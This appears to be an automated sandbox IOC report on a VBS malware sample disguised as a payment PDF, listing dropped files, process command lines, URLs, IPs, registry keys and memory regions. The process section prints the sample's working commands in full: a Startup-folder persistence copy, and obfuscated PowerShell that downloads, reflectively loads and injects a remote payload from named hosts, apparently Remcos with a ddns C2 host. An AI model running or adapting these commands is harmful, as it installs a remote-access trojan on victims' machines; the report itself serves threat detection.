IOC Report
PAYMENT SPECIFIKACIJA 364846637-pdf.vbs

loading gif

Files

File Path
Type
Category
Malicious
PAYMENT SPECIFIKACIJA 364846637-pdf.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
initial sample
malicious
C:\Users\user\remcos\logs.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ol05cmj.2ww.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3wd3nil0.nlv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ff3ttajc.cdk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uqyoxitt.3io.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzvstumv.dnh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ze1bl4os.guf.psm1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadilibisnapxe.vbs')')
malicious
C:\Windows\System32\PING.EXE
ping 127.0.0.1 -n 10
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Windows\system32\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadilibisnapxe.vbs')')
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRFblY6Y09tU1BlY1s0LDE1LDI1XS1KT0lOJycpKCAoJ1NIc3VybCAnKyc9JysnIDNkS2h0JysndCcrJ3BzOicrJy8vJysncmEnKyd3LmdpdGgnKyd1YnVzZScrJ3Jjb250ZW50LmNvbS9Ob0QnKydldCcrJ2VjdE9uL05vRGUnKyd0ZWN0T24vcmVmcy9oZWFkcy9tYWluL0RldCcrJ2FoTm90aC1WLicrJ3QnKyd4JysndDNkSycrJzsgJysnU0hzJysnYmFzZTY0Q29udGUnKydudCA9ICcrJyhOZXctTycrJ2JqZScrJ2N0JysnICcrJ1MnKyd5c3RlJysnbS5OZScrJ3QuV2ViQ2xpZW50KS5EbycrJ3dubG9hZFN0cmluZyhTSHN1cmwnKycpOyAnKydTSHNiaW5hcnknKydDb250JysnZW50ID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0JysncmluZyhTSHMnKydiYXNlNicrJzQnKydDb250ZW50KTsnKycgU0hzYXNzZW1iJysnbHkgPSBbUicrJ2VmbGVjJysndGlvbi5Bc3NlbWJseV06OicrJ0xvYWQoU0hzJysnYicrJ2luYScrJ3J5Q29udCcrJ2VudCk7JysnIFtkbmxpYi5JTy5IJysnb21lXTo6VkFJKGVXJysnQTAvSlU0YmYvZC9lZScrJy4nKydldHNhcC8vOnNwdHQnKydoZVdBLCAnKydlJysnV0FkJysnZXNhdGl2YWRvZScrJ1dBLCBlV0FkZXNhdGknKyd2YWQnKydvZVdBLCBlJysnV0FkZXNhdCcrJ2l2YWRvZVdBLCBlJysnV0FBZCcrJ2RJblByb2Nlc3MzJysnMmVXQSwgZScrJ1cnKydBZVdBLGVXQWUnKydXQSknKS5yRXBsYWNFKChbY0hBcl0xMDErW2NIQXJdODcrW2NIQXJdNjUpLFtzVHJJbmddW2NIQXJdMzQpLnJFcGxhY0UoJ1NIcycsW3NUckluZ11bY0hBcl0zNikuckVwbGFjRSgoW2NIQXJdNTErW2NIQXJdMTAwK1tjSEFyXTc1KSxbc1RySW5nXVtjSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $EnV:cOmSPec[4,15,25]-JOIN'')( ('SHsurl '+'='+' 3dKht'+'t'+'ps:'+'//'+'ra'+'w.gith'+'ubuse'+'rcontent.com/NoD'+'et'+'ectOn/NoDe'+'tectOn/refs/heads/main/Det'+'ahNoth-V.'+'t'+'x'+'t3dK'+'; '+'SHs'+'base64Conte'+'nt = '+'(New-O'+'bje'+'ct'+' '+'S'+'yste'+'m.Ne'+'t.WebClient).Do'+'wnloadString(SHsurl'+'); '+'SHsbinary'+'Cont'+'ent = [System.Convert]::From'+'Ba'+'se64St'+'ring(SHs'+'base6'+'4'+'Content);'+' SHsassemb'+'ly = [R'+'eflec'+'tion.Assembly]::'+'Load(SHs'+'b'+'ina'+'ryCont'+'ent);'+' [dnlib.IO.H'+'ome]::VAI(eW'+'A0/JU4bf/d/ee'+'.'+'etsap//:sptt'+'heWA, '+'e'+'WAd'+'esativadoe'+'WA, eWAdesati'+'vad'+'oeWA, e'+'WAdesat'+'ivadoeWA, e'+'WAAd'+'dInProcess3'+'2eWA, e'+'W'+'AeWA,eWAe'+'WA)').rEplacE(([cHAr]101+[cHAr]87+[cHAr]65),[sTrIng][cHAr]34).rEplacE('SHs',[sTrIng][cHAr]36).rEplacE(([cHAr]51+[cHAr]100+[cHAr]75),[sTrIng][cHAr]39) )"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://paste.ee/d/fb4UJ/0
188.114.97.3
malicious
ab9001.ddns.net
malicious
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
185.199.108.133
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://paste.ee
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://www.google.com;
unknown
https://contoso.com/Icon
unknown
https://raw.githubusercont
unknown
https://analytics.paste.ee
unknown
https://paste.ee
unknown
https://aka.ms/pscore6
unknown
https://github.com/Pester/Pester
unknown
http://geoplugin.net/json.gp
unknown
https://www.google.com
unknown
https://raw.githubusercontent.com
unknown
http://geoplugin.net/json.gp/C
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://raw.githubusercontent.com
unknown
https://oneget.orgX
unknown
https://analytics.paste.ee;
unknown
https://cdnjs.cloudflare.com
unknown
https://aka.ms/pscore68
unknown
https://cdnjs.cloudflare.com;
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.gravatar.com
unknown
https://themes.googleusercontent.com
unknown
https://oneget.org
unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt3dK;
unknown
There are 24 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
paste.ee
188.114.97.3
malicious
ab9001.ddns.net
64.188.16.157
malicious
raw.githubusercontent.com
185.199.108.133
fp2e7a.wpc.phicdn.net
192.229.221.95

IPs

IP
Domain
Country
Malicious
64.188.16.157
ab9001.ddns.net
United States
malicious
188.114.97.3
paste.ee
European Union
malicious
127.0.0.1
unknown
unknown
malicious
185.199.108.133
raw.githubusercontent.com
Netherlands

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-YJH0WY
exepath
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-YJH0WY
licence
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 6 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
12DB000
heap
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
12C8000
heap
page read and write
malicious
2001007E000
trusted library allocation
page read and write
malicious
2DDF000
stack
page read and write
malicious
2001111A000
trusted library allocation
page read and write
malicious
30DE000
stack
page read and write
7FF848770000
trusted library allocation
page read and write
2CF42DF2000
heap
page read and write
7FF848641000
trusted library allocation
page read and write
7FF848682000
trusted library allocation
page read and write
1FC60D76000
heap
page execute and read and write
7FF8487A0000
trusted library allocation
page read and write
1F12F7D8000
trusted library allocation
page read and write
1F12D905000
heap
page read and write
1FC48BF3000
trusted library allocation
page read and write
200003F3000
trusted library allocation
page read and write
20000223000
trusted library allocation
page read and write
1F12FF5A000
trusted library allocation
page read and write
2001061B000
trusted library allocation
page read and write
7FF848730000
trusted library allocation
page read and write
1F12F7EF000
trusted library allocation
page read and write
1FC60C38000
heap
page read and write
7FF848810000
trusted library allocation
page read and write
1FC4904A000
trusted library allocation
page read and write
2CF42F7B000
heap
page read and write
7FF848670000
trusted library allocation
page execute and read and write
1F14781D000
heap
page read and write
1F14783F000
heap
page read and write
1FC48650000
trusted library allocation
page read and write
2CF42E96000
heap
page read and write
475000
remote allocation
page execute and read and write
25BFBE000
stack
page read and write
20000427000
trusted library allocation
page read and write
7FF848494000
trusted library allocation
page read and write
9866A7E000
stack
page read and write
2CF41016000
heap
page read and write
38DF000
stack
page read and write
7FF848642000
trusted library allocation
page read and write
12A0000
heap
page read and write
2CF42E3B000
heap
page read and write
2CF42E7F000
heap
page read and write
7FF848730000
trusted library allocation
page read and write
2CF42DFB000
heap
page read and write
2006B7A0000
heap
page read and write
7FF84855C000
trusted library allocation
page execute and read and write
2006D100000
heap
page read and write
14BF000
stack
page read and write
7DD0C7B000
stack
page read and write
7FF848780000
trusted library allocation
page read and write
F737AFE000
stack
page read and write
2006D917000
heap
page read and write
2006D787000
heap
page read and write
25BBFE000
stack
page read and write
9866B7E000
stack
page read and write
1F12D85E000
heap
page read and write
2CF42E88000
heap
page read and write
9866C77000
stack
page read and write
7FF848660000
trusted library allocation
page execute and read and write
9866DFF000
stack
page read and write
2006CFE0000
trusted library allocation
page read and write
2006CFF0000
heap
page readonly
7FF8486B0000
trusted library allocation
page read and write
20010072000
trusted library allocation
page read and write
2CF42E91000
heap
page read and write
1F147AE0000
heap
page read and write
7DD0A7F000
stack
page read and write
2CF42E4E000
heap
page read and write
9866F7B000
stack
page read and write
2CF410E8000
heap
page read and write
7FF848690000
trusted library allocation
page read and write
7FF848550000
trusted library allocation
page execute and read and write
7FF84865A000
trusted library allocation
page read and write
1F12F82F000
trusted library allocation
page read and write
7FF8486C0000
trusted library allocation
page read and write
2CF40F98000
heap
page read and write
7FF848690000
trusted library allocation
page execute and read and write
2006DAF0000
heap
page read and write
98669FD000
stack
page read and write
2001101B000
trusted library allocation
page read and write
7FF8487A0000
trusted library allocation
page read and write
1F12F270000
heap
page read and write
1F12F1F0000
trusted library allocation
page read and write
2CF4105C000
heap
page read and write
1FC48CA9000
trusted library allocation
page read and write
7FF8487E0000
trusted library allocation
page read and write
7FF848790000
trusted library allocation
page read and write
2CF42F7F000
heap
page read and write
2006B60E000
heap
page read and write
2CF42F7E000
heap
page read and write
25BAFD000
stack
page read and write
F737535000
stack
page read and write
1F12F7EC000
trusted library allocation
page read and write
2CF42F01000
heap
page read and write
7FF848770000
trusted library allocation
page read and write
7FF8486B0000
trusted library allocation
page read and write
2CF42F73000
heap
page read and write
7FF8486E0000
trusted library allocation
page read and write
7FF848586000
trusted library allocation
page execute and read and write
7FF8484A0000
trusted library allocation
page read and write
200016E0000
trusted library allocation
page read and write
7FF84884B000
trusted library allocation
page read and write
7FF848823000
trusted library allocation
page read and write
1F12D790000
heap
page read and write
200003F0000
trusted library allocation
page read and write
7FF848821000
trusted library allocation
page read and write
2CDE000
stack
page read and write
7FF8484A3000
trusted library allocation
page execute and read and write
1FC46C70000
heap
page read and write
7FF848760000
trusted library allocation
page read and write
1F12FC85000
trusted library allocation
page read and write
12E4000
heap
page read and write
1F12D7F0000
heap
page read and write
1F12D832000
heap
page read and write
2CF42E88000
heap
page read and write
7FF8487E0000
trusted library allocation
page read and write
20010011000
trusted library allocation
page read and write
2000170A000
trusted library allocation
page read and write
2CF410DC000
heap
page read and write
2CF43000000
heap
page read and write
2CF42DF4000
heap
page read and write
1F12F71A000
trusted library allocation
page read and write
2CF42E26000
heap
page read and write
7FF8485C0000
trusted library allocation
page execute and read and write
20000001000
trusted library allocation
page read and write
1F1478BC000
heap
page read and write
7FF8487C0000
trusted library allocation
page read and write
2CF410E8000
heap
page read and write
7FF84865A000
trusted library allocation
page read and write
1F12F6EB000
trusted library allocation
page read and write
1F12F739000
trusted library allocation
page read and write
1FC46CD0000
heap
page read and write
2000007B000
trusted library allocation
page read and write
7FF8487B0000
trusted library allocation
page read and write
1F12F1E0000
heap
page readonly
2CF42E63000
heap
page read and write
1FC491AA000
trusted library allocation
page read and write
2006D180000
heap
page read and write
25BCF9000
stack
page read and write
7FF8487B0000
trusted library allocation
page read and write
7FF8485B0000
trusted library allocation
page execute and read and write
2006D4D9000
heap
page read and write
2CF42E68000
heap
page read and write
2CF42E98000
heap
page read and write
1F12D820000
heap
page read and write
1F12F74A000
trusted library allocation
page read and write
7DD09FE000
stack
page read and write
9866AFE000
stack
page read and write
1FC485A0000
trusted library allocation
page read and write
1FC48C0E000
trusted library allocation
page read and write
1FC48BB1000
trusted library allocation
page read and write
1FC48BC4000
trusted library allocation
page read and write
7DD097D000
stack
page read and write
200016E6000
trusted library allocation
page read and write
7FF848651000
trusted library allocation
page read and write
2006D070000
trusted library allocation
page read and write
2006B5FA000
heap
page read and write
2CF42E78000
heap
page read and write
1F12D864000
heap
page read and write
2CF40F90000
heap
page read and write
2CF40F9A000
heap
page read and write
7FF848740000
trusted library allocation
page read and write
1FC49071000
trusted library allocation
page read and write
2CF42DF0000
heap
page read and write
1FC46C50000
heap
page read and write
2CF42F00000
heap
page read and write
2006D000000
trusted library allocation
page read and write
1F12F7DB000
trusted library allocation
page read and write
7FF84883C000
trusted library allocation
page read and write
2006B800000
heap
page read and write
1F12D7B0000
heap
page read and write
2CF42E2B000
heap
page read and write
1FC46D5D000
heap
page read and write
25BDB8000
stack
page read and write
7FF84854C000
trusted library allocation
page execute and read and write
20000517000
trusted library allocation
page read and write
2006D6A7000
heap
page execute and read and write
2F5F000
stack
page read and write
1FC60C9A000
heap
page read and write
2CF42E2E000
heap
page read and write
7FF848750000
trusted library allocation
page read and write
2006B5F8000
heap
page read and write
7FF848780000
trusted library allocation
page read and write
2CF42E7F000
heap
page read and write
1FC46CD9000
heap
page read and write
F7381FF000
stack
page read and write
2CF42E6B000
heap
page read and write
7FF848740000
trusted library allocation
page read and write
31DF000
stack
page read and write
2CF410A7000
heap
page read and write
1FC48CAC000
trusted library allocation
page read and write
10C0000
heap
page read and write
2CF42E17000
heap
page read and write
2CF42F4A000
heap
page read and write
2CF42E63000
heap
page read and write
471000
remote allocation
page execute and read and write
7FF848790000
trusted library allocation
page read and write
7FF8486C0000
trusted library allocation
page read and write
2CF42F72000
heap
page read and write
7FF848710000
trusted library allocation
page read and write
2CF42E80000
heap
page read and write
2CF42E5F000
heap
page read and write
2CF42E7F000
heap
page read and write
9867A4D000
stack
page read and write
7FF848750000
trusted library allocation
page read and write
7FF848660000
trusted library allocation
page execute and read and write
1FC490DC000
trusted library allocation
page read and write
1F147980000
heap
page read and write
7FF8484AD000
trusted library allocation
page execute and read and write
2006D8B0000
heap
page read and write
7FF8484A4000
trusted library allocation
page read and write
2CF4109E000
heap
page read and write
1F12D87E000
heap
page read and write
7FF848560000
trusted library allocation
page execute and read and write
7FF848750000
trusted library allocation
page read and write
2006D040000
trusted library allocation
page read and write
7FF8484AC000
trusted library allocation
page read and write
7DD0BF7000
stack
page read and write
7DD0EFE000
stack
page read and write
F7379FE000
stack
page read and write
1F12D8A8000
heap
page read and write
F7382FB000
stack
page read and write
7FF848550000
trusted library allocation
page read and write
2CF42E8E000
heap
page read and write
1FC48BA0000
heap
page read and write
2CF42E86000
heap
page read and write
7FF848540000
trusted library allocation
page read and write
7FF8484A4000
trusted library allocation
page read and write
7FF84849D000
trusted library allocation
page execute and read and write
2006B635000
heap
page read and write
1FC46D19000
heap
page read and write
1F12F6C0000
heap
page read and write
F7378FE000
stack
page read and write
9866D7E000
stack
page read and write
1F12F7DE000
trusted library allocation
page read and write
11B0000
heap
page read and write
7DD0B77000
stack
page read and write
7FF848546000
trusted library allocation
page read and write
1FC46CB0000
heap
page read and write
7FF848660000
trusted library allocation
page execute and read and write
F737EFD000
stack
page read and write
9866BF9000
stack
page read and write
7FF8486D0000
trusted library allocation
page read and write
25BE39000
stack
page read and write
2CF4305D000
heap
page read and write
1FC60BB0000
heap
page read and write
2CF42E21000
heap
page read and write
7FF848790000
trusted library allocation
page read and write
7FF848730000
trusted library allocation
page read and write
7FF8486E0000
trusted library allocation
page read and write
7FF848710000
trusted library allocation
page read and write
2CF42E96000
heap
page read and write
7FF8486D0000
trusted library allocation
page read and write
7DF4CEDE0000
trusted library allocation
page execute and read and write
F737DFE000
stack
page read and write
2CF40FF0000
heap
page read and write
200102FB000
trusted library allocation
page read and write
1F1477E6000
heap
page read and write
1FC60C54000
heap
page read and write
2CF42E7F000
heap
page read and write
2CF42E96000
heap
page read and write
1FC491B4000
trusted library allocation
page read and write
200019B3000
trusted library allocation
page read and write
2CF42E88000
heap
page read and write
1FC46D13000
heap
page read and write
7FF8487F0000
trusted library allocation
page read and write
7FF848740000
trusted library allocation
page read and write
2CF40F70000
heap
page read and write
2CF42970000
heap
page read and write
7DD0F7B000
stack
page read and write
200003FB000
trusted library allocation
page read and write
2CF42E0F000
heap
page read and write
2006B5F0000
heap
page read and write
2006B590000
heap
page read and write
2CF40F98000
heap
page read and write
1F13F6D1000
trusted library allocation
page read and write
20001660000
trusted library allocation
page read and write
1F1478AA000
heap
page read and write
7FF8487D0000
trusted library allocation
page read and write
7DD0523000
stack
page read and write
2006D6CF000
heap
page read and write
7DD0AFE000
stack
page read and write
2006DC40000
trusted library section
page read and write
7FF848720000
trusted library allocation
page read and write
1F1478DC000
heap
page read and write
7FF8484AD000
trusted library allocation
page execute and read and write
7FF8485C0000
trusted library allocation
page execute and read and write
7FF848700000
trusted library allocation
page read and write
25BD3E000
stack
page read and write
2CF42E7F000
heap
page read and write
2CF41069000
heap
page read and write
25B7EF000
stack
page read and write
7FF8484BB000
trusted library allocation
page read and write
7FF8484B0000
trusted library allocation
page read and write
7DD0CF9000
stack
page read and write
1FC48CB0000
trusted library allocation
page read and write
2CF4109E000
heap
page read and write
2006B5EE000
heap
page read and write
7DD0DFE000
stack
page read and write
2CF42F4B000
heap
page read and write
1FC46D31000
heap
page read and write
2CF42E0A000
heap
page read and write
2CF410E4000
heap
page read and write
25C03E000
stack
page read and write
1FC60BE7000
heap
page read and write
9866E7E000
stack
page read and write
1F12D8A6000
heap
page read and write
2006D6B0000
heap
page read and write
1F12D780000
heap
page read and write
7FF84864A000
trusted library allocation
page read and write
2E50000
heap
page read and write
7FF848576000
trusted library allocation
page execute and read and write
2006D186000
heap
page read and write
1FC48CEE000
trusted library allocation
page read and write
2CF42E5A000
heap
page read and write
2006B780000
heap
page read and write
1FC48CA6000
trusted library allocation
page read and write
2006D71B000
heap
page read and write
2CF42E7F000
heap
page read and write
1F12F76C000
trusted library allocation
page read and write
2CF41099000
heap
page read and write
2CF42F76000
heap
page read and write
1FC48570000
heap
page read and write
200016F8000
trusted library allocation
page read and write
2006D7A8000
heap
page read and write
1F12F690000
heap
page execute and read and write
2CF42F7A000
heap
page read and write
7FF848586000
trusted library allocation
page execute and read and write
2CF40F9A000
heap
page read and write
7FF8486A0000
trusted library allocation
page read and write
2CF42E7F000
heap
page read and write
1F147AD0000
heap
page read and write
1FC60BD9000
heap
page read and write
200016FA000
trusted library allocation
page read and write
2006D072000
trusted library allocation
page read and write
2006D6E8000
heap
page read and write
7FF8486A0000
trusted library allocation
page read and write
1FC486F6000
heap
page read and write
2006D030000
heap
page execute and read and write
2000042B000
trusted library allocation
page read and write
1F13F742000
trusted library allocation
page read and write
7FF848850000
trusted library allocation
page read and write
1F12FB7A000
trusted library allocation
page read and write
7FF8486E0000
trusted library allocation
page read and write
2006B63A000
heap
page read and write
2CF42F84000
heap
page read and write
1FC48C35000
trusted library allocation
page read and write
1F12F7E1000
trusted library allocation
page read and write
1F12D810000
heap
page read and write
2F9C000
stack
page read and write
25B76E000
stack
page read and write
2CF42F73000
heap
page read and write
2CF42E02000
heap
page read and write
2006CFC0000
trusted library allocation
page read and write
2006B7D0000
heap
page read and write
1FC46CE3000
heap
page read and write
2CF42E73000
heap
page read and write
7FF848672000
trusted library allocation
page read and write
7FF848690000
trusted library allocation
page execute and read and write
1FC46B70000
heap
page read and write
7FF848682000
trusted library allocation
page read and write
200003FF000
trusted library allocation
page read and write
2006D70A000
heap
page read and write
2006B5B0000
heap
page read and write
7FF8486D0000
trusted library allocation
page read and write
2CF42E96000
heap
page read and write
1F147950000
heap
page execute and read and write
2006D777000
heap
page read and write
2006D184000
heap
page read and write
2000053E000
trusted library allocation
page read and write
2CF40FF9000
heap
page read and write
20001C33000
trusted library allocation
page read and write
7FF848760000
trusted library allocation
page read and write
25BB7E000
stack
page read and write
986697E000
stack
page read and write
200003E6000
trusted library allocation
page read and write
7FF848710000
trusted library allocation
page read and write
25B6E2000
stack
page read and write
2CF410A0000
heap
page read and write
98679CE000
stack
page read and write
7FF8487C0000
trusted library allocation
page read and write
2006B804000
heap
page read and write
1090000
heap
page read and write
7FF848556000
trusted library allocation
page read and write
1F12F6D1000
trusted library allocation
page read and write
1F14788F000
heap
page read and write
1FC58C21000
trusted library allocation
page read and write
7FF8484B0000
trusted library allocation
page read and write
7FF8487A0000
trusted library allocation
page read and write
25C0BB000
stack
page read and write
1FC58BB1000
trusted library allocation
page read and write
2CF42E4B000
heap
page read and write
1FC60D50000
heap
page read and write
7DD08FF000
stack
page read and write
1F12F1B0000
trusted library allocation
page read and write
7DD05AE000
stack
page read and write
20000F3E000
trusted library allocation
page read and write
1F12FD64000
trusted library allocation
page read and write
7FF848760000
trusted library allocation
page read and write
7FF848770000
trusted library allocation
page read and write
DDB000
stack
page read and write
11A0000
heap
page read and write
7FF8484A3000
trusted library allocation
page execute and read and write
2CF40F9B000
heap
page read and write
9866EFE000
stack
page read and write
98668FE000
stack
page read and write
7FF848556000
trusted library allocation
page read and write
1FC485D0000
heap
page readonly
2CF42DF1000
heap
page read and write
986687E000
stack
page read and write
1FC60E90000
heap
page read and write
1FC60BF2000
heap
page read and write
20000403000
trusted library allocation
page read and write
1F12F275000
heap
page read and write
1F12F1D0000
trusted library allocation
page read and write
2CF42E12000
heap
page read and write
25BC7E000
stack
page read and write
7FF8487B0000
trusted library allocation
page read and write
F737CFF000
stack
page read and write
1FC486F0000
heap
page read and write
7FF8486F0000
trusted library allocation
page read and write
2006B5B9000
heap
page read and write
1FC48CB3000
trusted library allocation
page read and write
7FF848720000
trusted library allocation
page read and write
37DE000
stack
page read and write
1FC46CB5000
heap
page read and write
25BF3E000
stack
page read and write
1FC48B80000
heap
page execute and read and write
7FF8484EC000
trusted library allocation
page execute and read and write
CDC000
stack
page read and write
1F12FAB4000
trusted library allocation
page read and write
2CF40F9C000
heap
page read and write
20001CFD000
trusted library allocation
page read and write
1FC46D11000
heap
page read and write
20001706000
trusted library allocation
page read and write
2CF4305E000
heap
page read and write
1FC46D1D000
heap
page read and write
2000192C000
trusted library allocation
page read and write
1F147957000
heap
page execute and read and write
7FF84855C000
trusted library allocation
page execute and read and write
1FC46D59000
heap
page read and write
7FF8486F0000
trusted library allocation
page read and write
2CF410AA000
heap
page read and write
108E000
stack
page read and write
7FF848642000
trusted library allocation
page read and write
1FC48660000
heap
page execute and read and write
25BEB8000
stack
page read and write
2006D70C000
heap
page read and write
2CF42F86000
heap
page read and write
2CF42E7F000
heap
page read and write
2CF42E80000
heap
page read and write
1F12F828000
trusted library allocation
page read and write
2CF42E07000
heap
page read and write
1FC60D70000
heap
page execute and read and write
7FF848680000
trusted library allocation
page execute and read and write
2CF42E60000
heap
page read and write
7FF848492000
trusted library allocation
page read and write
7DD0D7E000
stack
page read and write
2CF410A0000
heap
page read and write
1F12D815000
heap
page read and write
2CF40F60000
heap
page read and write
7DD087E000
stack
page read and write
7FF848630000
trusted library allocation
page read and write
2006D160000
heap
page execute and read and write
2CF42E1A000
heap
page read and write
7FF848493000
trusted library allocation
page execute and read and write
98665DE000
stack
page read and write
1FC60C96000
heap
page read and write
986794E000
stack
page read and write
7FF848651000
trusted library allocation
page read and write
1FC60BB8000
heap
page read and write
2CF40FA0000
heap
page read and write
7FF848550000
trusted library allocation
page read and write
7FF848720000
trusted library allocation
page read and write
2006D6A0000
heap
page execute and read and write
2CF42E7F000
heap
page read and write
9866CF9000
stack
page read and write
12C0000
heap
page read and write
1FC60DA0000
heap
page read and write
7FF848700000
trusted library allocation
page read and write
7FF848700000
trusted library allocation
page read and write
2CF40F9A000
heap
page read and write
7FF8487C0000
trusted library allocation
page read and write
1FC485C0000
trusted library allocation
page read and write
7FF848640000
trusted library allocation
page read and write
1FC58BC1000
trusted library allocation
page read and write
1F12F7E4000
trusted library allocation
page read and write
2E1B000
stack
page read and write
7FF848843000
trusted library allocation
page read and write
2CF410A5000
heap
page read and write
2CF410B0000
heap
page read and write
7FF848650000
trusted library allocation
page execute and read and write
20001CF9000
trusted library allocation
page read and write
1FC48CA3000
trusted library allocation
page read and write
1F12FBD6000
trusted library allocation
page read and write
379F000
stack
page read and write
7DD05EE000
stack
page read and write
1F12D827000
heap
page read and write
7FF848560000
trusted library allocation
page execute and read and write
1F12F7F2000
trusted library allocation
page read and write
2CF42E85000
heap
page read and write
2CF42E1F000
heap
page read and write
1F12F230000
heap
page execute and read and write
7FF848800000
trusted library allocation
page read and write
25BA7E000
stack
page read and write
20010001000
trusted library allocation
page read and write
2CF4102D000
heap
page read and write
2CF40F95000
heap
page read and write
1FC60E80000
heap
page read and write
2CF43001000
heap
page read and write
7FF8486F0000
trusted library allocation
page read and write
2CF42E7F000
heap
page read and write
2CF410E8000
heap
page read and write
2CF42E3F000
heap
page read and write
7FF8484A2000
trusted library allocation
page read and write
2CF40F9A000
heap
page read and write
369E000
stack
page read and write
7FF8484B0000
trusted library allocation
page read and write
20001958000
trusted library allocation
page read and write
2CF42E70000
heap
page read and write
7FF8486B0000
trusted library allocation
page read and write
2000172E000
trusted library allocation
page read and write
2CF42E57000
heap
page read and write
9866593000
stack
page read and write
309F000
stack
page read and write
2CF410DB000
heap
page read and write
2CF410E2000
heap
page read and write
2006D7D0000
heap
page read and write
F737FFE000
stack
page read and write
1040000
heap
page read and write
1F13F6E0000
trusted library allocation
page read and write
1F1477E0000
heap
page read and write
2006B5EC000
heap
page read and write
7FF8486A0000
trusted library allocation
page read and write
7FF8486C0000
trusted library allocation
page read and write
7FF8487D0000
trusted library allocation
page read and write
2006B5CF000
heap
page read and write
7FF848780000
trusted library allocation
page read and write
10C6000
heap
page read and write
2CF42E42000
heap
page read and write
There are 530 hidden memdumps, click here to show them.